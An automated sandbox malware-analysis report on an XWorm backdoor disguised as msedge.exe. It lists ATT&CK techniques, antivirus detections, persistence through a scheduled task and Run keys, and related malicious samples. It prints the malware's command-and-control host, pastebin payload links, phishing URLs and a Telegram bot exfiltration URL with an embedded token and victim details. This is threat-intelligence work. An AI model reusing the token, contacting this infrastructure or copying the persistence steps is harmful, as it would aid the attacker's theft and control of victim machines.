DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
msedge.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
msedge.exe	100%	Avira	TR/Spy.Gen
msedge.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\msedge.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\msedge.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm

Name	IP	Active	Malicious	Reputation
api.telegram.org	149.154.167.220	true	false	high
upon-forming.gl.at.ply.gg	147.185.221.24	true	true	unknown
pastebin.com	104.20.3.235	true	false	high
i.ibb.co	91.134.9.160	true	false	high

Contacted URLs

Name	Malicious	Reputation
https://pastebin.com/raw/ZnhxAV6a	false	high
https://i.ibb.co/Dwrj41N/Image.png	false	high
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://upx.sf.net	Amcache.hve.14.dr	false	high
https://i.ibb.co	msedge.exe, 00000000.00000002.3551685304.0000000002A4B000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://i.ibb.co	msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msedge.exe, msedge.exe.0.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msedge.exe, 00000000.00000002.3551685304.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
91.134.9.160	i.ibb.co	France	16276	OVHFR	false
147.185.221.24	upon-forming.gl.at.ply.gg	United States	12087	SALSGIVERUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566853
Start date and time:	2024-12-02 18:44:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Sample name:	msedge.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/9@4/4
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 56 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msedge.exe, PID 2336 because it is empty
Execution Graph export aborted for target msedge.exe, PID 2816 because it is empty
Execution Graph export aborted for target msedge.exe, PID 4584 because it is empty
Execution Graph export aborted for target msedge.exe, PID 5316 because it is empty
Execution Graph export aborted for target msedge.exe, PID 6072 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: msedge.exe

Simulations

Behavior and APIs

Time	Type	Description
12:44:53	API Interceptor	5693250x Sleep call for process: msedge.exe modified
17:44:55	Task Scheduler	Run new task: msedge path: C:\Users\user\AppData\Local\msedge.exe
17:44:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Local\msedge.exe
17:45:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Local\msedge.exe
17:45:15	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	gabe.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_atCAD.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	Lm9IJ4r9oO.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
149.154.167.220	https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org	Get hash	malicious	HTMLPhisher	Browse
	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://fn-fi.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
147.185.221.24	6ox7RfKeE3.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	miIs5mgmnJ.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	88xEblpl6Y.exe	Get hash	malicious	XWorm	Browse
	CZxDiTktSY.exe	Get hash	malicious	XWorm	Browse
	TcQOmn7lnP.exe	Get hash	malicious	XWorm	Browse
	1LFcs1ZJy2.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
i.ibb.co	https://citiscapegroupae-my.sharepoint.com/:li:/g/personal/asekhar_citiscapegroup_com/E9U24ACMrctKoLKfReMWVjMBfxodtw3c4oUIHo4oyReVhg?e=SgIv5D&xsdata=MDV8MDJ8ZGVyZWsuZGVscG9ydEBvbnRoZWRvdC5jby56YXw5ZWEzNzFkNDdmNTM0YzE2Yjg5YTA4ZGQwZTAwZjY1OXwxMGRjN2M5NjU5NzY0NjAxODgyYzlhYzdjMjg3MGVjY3wxfDB8NjM4NjgyMTE5NTE1MDk3NDExfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=S3JqYzUxeUd4SmtWMEVWUzBMU3JUREpWTEJiN3VmeFVrY09ucElOZDRzaz0%3d	Get hash	malicious	HTMLPhisher	Browse	91.134.10.127
	Fatura931Pendente956.pdf761.msi	Get hash	malicious	Unknown	Browse	91.134.82.79
	https://trimmer.to:443/GWHMY	Get hash	malicious	HTMLPhisher	Browse	162.19.58.157
	2024101221359RemitanceAdvice..pdf	Get hash	malicious	HTMLPhisher	Browse	162.19.58.161
	https://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56g	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://berg.bergssrom.mom/fer.to.php.html	Get hash	malicious	Unknown	Browse	162.19.58.161
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/%6D%61%69%6C%2E%72%69%67%6F%74%69%6C%65%73%2E%63%6F%6D%2F%6A%50%73%51%57%55%63%42	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	162.19.58.157
	main.exe	Get hash	malicious	Unknown	Browse	169.197.85.95
	SecureMessageATT.html	Get hash	malicious	HTMLPhisher	Browse	104.194.8.184
	https://www.phsinc.com/?bwfan-track-action=click&bwfan-track-id=0ecdd1bdf2276cad3fa2d27ffa918e84&bwfan-uid=e2dffed46dd69d19d18bc527d6255bd5&bwfan-link=%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%2E%72%69%67%6F%74%69%6C%65%73%2E%63%6F%6D%2F%6A%50%73%51%57%55%63%42	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	162.19.58.157
pastebin.com	Full_Setup_v24.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	asegurar.vbs	Get hash	malicious	Unknown	Browse	104.20.4.235
	crypted_LummaC2.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	crypted_LummaC2 (3).exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.4.235
	segura.vbs	Get hash	malicious	Unknown	Browse	104.20.3.235
	DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	172.67.19.24
	Rooming list.js	Get hash	malicious	Remcos	Browse	104.20.4.235
	https://pastebin.com/raw/0v6Vhvpb	Get hash	malicious	Unknown	Browse	104.20.4.235
	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.19.24
api.telegram.org	https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://fn-fi.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://fn-fi.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	tA5DvuNwfQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order C0038 2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
OVHFR	specification and drawing.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	5.39.10.93
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	51.195.138.197
	https://mariculturasalinas.com/za/zap/enter.php	Get hash	malicious	Unknown	Browse	144.217.158.134
	tDLozbx48F.exe	Get hash	malicious	Gurcu Stealer	Browse	51.77.125.62
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	51.81.38.2
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	54.39.187.178
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	167.114.174.119
	FwR7as4xUq.exe	Get hash	malicious	Unknown	Browse	139.99.188.124
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	217.182.108.215
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	51.254.200.190
CLOUDFLARENETUS	zdi.txt.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	104.21.68.89
	https://www.paypal.com/myaccount/transaction/details/7PH333382L561513K?v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000298&utm_unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&ppid=RT000298&cnac=US&rsta=en_US%28en-US%29&unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&calc=0052231041435&unp_tpcid=email-standard-transaction-unilateral&page=main%3Aemail%3ART000298&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&xt=145585%2C150948%2C104038	Get hash	malicious	Unknown	Browse	1.1.1.1
	Wc pay benefit.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	http://mailgun.internationalsos.com/c/eJxUzcGO2yoYxfGngR0RYIxhwcKO4d5ITRuNpyN1ieFLhtYGy7it5u2rLGd5jvTX77_rdIVa_QMuo-GKMqnahuEpHRDKDpcD1stoUDe0cuDtKAbCGtsRofuBaMktGRRzfSdGRgVD3fip_OLz47d_gIH86X-DvaaSDcPTR30K0UgcjQAW7hgM6xqupNSa4nej52YOSrVRNJ7OAhRwJmcRwj3ArEKHkxnP0tmzUoRa3hHBdEsGJzviBqbcMGrba4cE_T5ZNv3f36br622iDV7M-3FsFTU94g5xF2Jmp5QP2LM_Usl-qaWeQlkRdwRx97PWFWLyiLvN5whrCog7lxaoiLvocyQb2SK5P2fKx0JqqWQrSypk9R-EUy5OW7wjy5GiSJ_xbl6-_Ti92Zfptb_d7Fck6F7Cr7-lLE8X_zH8XwAAAP__jX59nw	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://pa.compassionatetraveler.org/kqawsedrftgyhugtfrdesedrftgyhujwsedrfgtyhhygtfrderftghyujikiujhygtfrtgyhujjuhygtfrtgyhuji%20	Get hash	malicious	Unknown	Browse	172.66.40.234
	http://ar-oracle.com	Get hash	malicious	Unknown	Browse	104.18.161.117
	Employee_Important_Message.pdf	Get hash	malicious	Unknown	Browse	104.26.13.205
	ATT4802.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Flumroc.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
SALSGIVERUS	x9XhRITucw.exe	Get hash	malicious	XWorm	Browse	147.185.221.20
	6ox7RfKeE3.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	147.168.242.169
	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	miIs5mgmnJ.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	88xEblpl6Y.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	147.185.47.212
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	65.199.17.173
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	147.168.113.41
	mips.elf	Get hash	malicious	Mirai	Browse	147.170.50.225

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	https://www.yamajifactory.com/products/-blocks?adr_sou=Facebook&adr_con=scsjchymyyxgs136x&adr_ter=1747260705659006&adr_camId=120212709087730561&adr_adsetId=120212709088740561&adr_adId=120212709088200561&adr_camName=%E5%8F%98%E8%84%B8%E7%A7%AF%E6%9C%A8-%E7%A9%BA-241105-10%E7%BE%8E%E9%87%91+-+%E5%B9%BF%E5%91%8A%E5%89%AF%E6%9C%AC&adr_adsetName=%E7%A9%BA&adr_adName=1&fbclid=IwY2xjawG5dOBleHRuA2FlbQEwAGFkaWQBqxTSdVwj4QEdhDiYdyfw0MIu-_Lo4d4m7akVHEnikvJvX5tkNnnCz6_J__eLEz3mVKk8_aem_PKTifAkeMTNORNhDxlyTuA	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	HALKBANK EFT RECEIPT DATED 02.12.2024.exe	Get hash	malicious	Snake Keylogger	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	#U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	l6F8Xgr0Ov.exe	Get hash	malicious	AgentTesla	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	SPlVyHiGOz.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.20.3.235 149.154.167.220 91.134.9.160
	55qIbHIAZi.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.20.3.235 149.154.167.220 91.134.9.160

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_2c2ca92dcd483d7a57334730825da1e95a3edac_e2b55a38_ee85a960-0b5e-4b89-bdc6-b3f5bd0c3ccc\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5124730015755325
Encrypted:	false
SSDEEP:	384:whC0G0SE81ixa48i/Sw1zuiFqY4lO8/5:cC6SE81ixafw1zuiFqY4lO8
MD5:	3766CC483EA759AD59689238E00911F5
SHA1:	937D073285671C09BAB5A177D2B5EA4C2D77AE52
SHA-256:	9BB8A235008C8E649C8D3210BF6B2904ECFEBC0B2B15F6C2F377A4706A3FCA27
SHA-512:	2136838AECBC3D69FA89D9B62E4622FC8E48421DB5AF776FE9B56D07003D6CB60FC5E04938868E947C332DD60A804B2118ADEEAEDAE68575496EAA11E21C4864
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.6.3.5.2.8.2.0.5.0.6.5.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.8.5.a.9.6.0.-.0.b.5.e.-.4.b.8.9.-.b.d.c.6.-.b.3.f.5.b.d.0.c.3.c.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.2.c.6.f.c.c.-.0.9.0.2.-.4.f.b.d.-.b.3.2.1.-.3.c.5.e.8.0.5.f.5.d.e.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.z.C.l.i.e.n.t.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.c.-.0.0.0.1.-.0.0.1.4.-.f.f.b.0.-.8.b.e.4.e.1.4.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.9.e.e.5.b.6.c.b.0.5.2.0.e.1.6.a.c.4.1.a.e.8.4.c.f.1.e.6.e.c.c.0.0.0.0.0.0.0.0.!.0.0.0.0.9.2.b.f.5.1.5.7.4.1.7.7.5.f.a.c.2.2.6.9.0.e.f.c.0.e.4.0.0.f.6.9.9.7.e.b.a.7.3.5.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.0.3.:.0.0.:.1.5.:.2.5.!.0.!.m.s.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A3A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Mon Dec 2 17:48:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	738261
Entropy (8bit):	3.3224010701805247
Encrypted:	false
SSDEEP:	12288:UFypES5/EicDxEnSbKJXLYfFqLu3uw/QI:UFijE5NiWFqRkQI
MD5:	8A07918064BC32A7EA5E2131B1B50EF6
SHA1:	67AF4F77BF4AC115B7B4EDF54A518CE5F77B9170
SHA-256:	58F5A0CA51BA2DB8FB2401D556F101816EA9083252161EE131D2FA59EEF1DCF7
SHA-512:	79D94EC5D3F90F483077850F52F725F827023C97D5C303A79681CE8C1C91EDD48FDF4163ADC87DD031B79B98217AD0195516BAB82EF9CF87AC8E5558B4295079
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Mg............$............0..D.......<...`;...........;.......p..............l.......8...........T...........p\|..e...........HT..........4V..............................................................................eJ.......V......Lw......................T.............Mg....r........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D19.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9326
Entropy (8bit):	3.70312232738191
Encrypted:	false
SSDEEP:	192:R6l7wVeJtl3366Y9Hzygmfk4jV4t8EprL89b3CBvSfhdm:R6lXJf3366Y1zygmfk04tk3nfS
MD5:	F14E8191087C9E956688DBAF31316102
SHA1:	A8D57C6FD16D219C1D381B43509BFF87D99D0E1C
SHA-256:	6B5DF8BED0D28A382CAD7222ED639916AF346B59E3BBF431F75162AA55C7A346
SHA-512:	9890F7C78FEB71DBFE1A352D5F4A2DC993444A803077EDC3257B361D4FC53F14F0159948DFE803F3B657EF101F6929B970480D851A465D5D9B8ACC7B61D0308E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D59.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4922
Entropy (8bit):	4.451284746342769
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZKJg771I9z4WpW8VYqvYm8M4JO/SFFyq8vRV/MW1njnwDlk4d:uIjfCI7Mx7V5yJXWwWRjnwBk4d
MD5:	0EA84B06A4D5E4A19B64EF58F1ADD740
SHA1:	7E96319D665EFA4C02505A6A3AA718D1395982E1
SHA-256:	AB114736A7228054ED07B0A6306EB2DADC7122A6EA97AE5221353A9D3DAE651F
SHA-512:	463E10B5DF979AB208D281D6D45935F9FF2EEC19FCBC5E8D83E41AA215B71DDBB04CA629BD6CADA2B03341896B2CB8378588D747E81F6C7A75A44F5AB77BC9C0
Malicious:	false
Reputation:	low
